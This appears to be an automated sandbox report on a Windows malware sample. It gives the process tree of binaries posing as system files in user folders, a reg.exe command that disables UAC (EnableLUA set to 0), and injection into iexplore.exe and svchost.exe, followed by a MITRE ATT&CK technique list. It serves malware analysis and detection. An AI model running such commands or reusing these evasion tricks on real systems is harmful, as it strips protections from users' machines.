C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6724
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:11052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8244
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\WindowsServices.exe" ..
1⤵
PID:5636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\WindowsServices.exe" ..
1⤵
PID:4236
- C:\Windows\WindowsServices.exe
  C:\Windows\WindowsServices.exe ..
  2⤵
  PID:11760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11032
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:11972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10488
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:3648
- C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
  C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
  2⤵
  PID:11112
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:12248
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:10912
- - \??\c:\program files (x86)\internet explorer\iexplore.exe
    "c:\program files (x86)\internet explorer\iexplore.exe"
    3⤵
    PID:10660
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:11764
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      PID:9312
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:9956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:5272
- C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
  C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
  2⤵
  PID:2100
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:11220
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:10668
- - \??\c:\program files (x86)\internet explorer\iexplore.exe
    "c:\program files (x86)\internet explorer\iexplore.exe"
    3⤵
    PID:1932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8868
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:10200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3656
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:10588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11636
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11644
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:12116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:12124
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7808

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x340
1⤵
PID:9236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11852
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9692
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:7892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:11340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:8764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:8692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:8280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:9732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:9508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\vjxs\WSCMNO~1.EXE c:\vjxs\fvpgftw.msc
1⤵
PID:11892

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:8352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:12096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:12008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:10528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:7440

C:\Users\Admin\AppData\Roaming\conhost.exe
C:\Users\Admin\AppData\Roaming\conhost.exe ..
1⤵
PID:10144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8932

C:\Users\Admin\AppData\Local\MethodSignature\jqznxoi\AreAuditRulesCanonical.exe
C:\Users\Admin\AppData\Local\MethodSignature\jqznxoi\AreAuditRulesCanonical.exe
1⤵
PID:4684

C:\Users\Admin\AppData\Roaming\conhost.exe
C:\Users\Admin\AppData\Roaming\conhost.exe ..
1⤵
PID:9932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:7596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
1⤵
PID:9804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11184

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery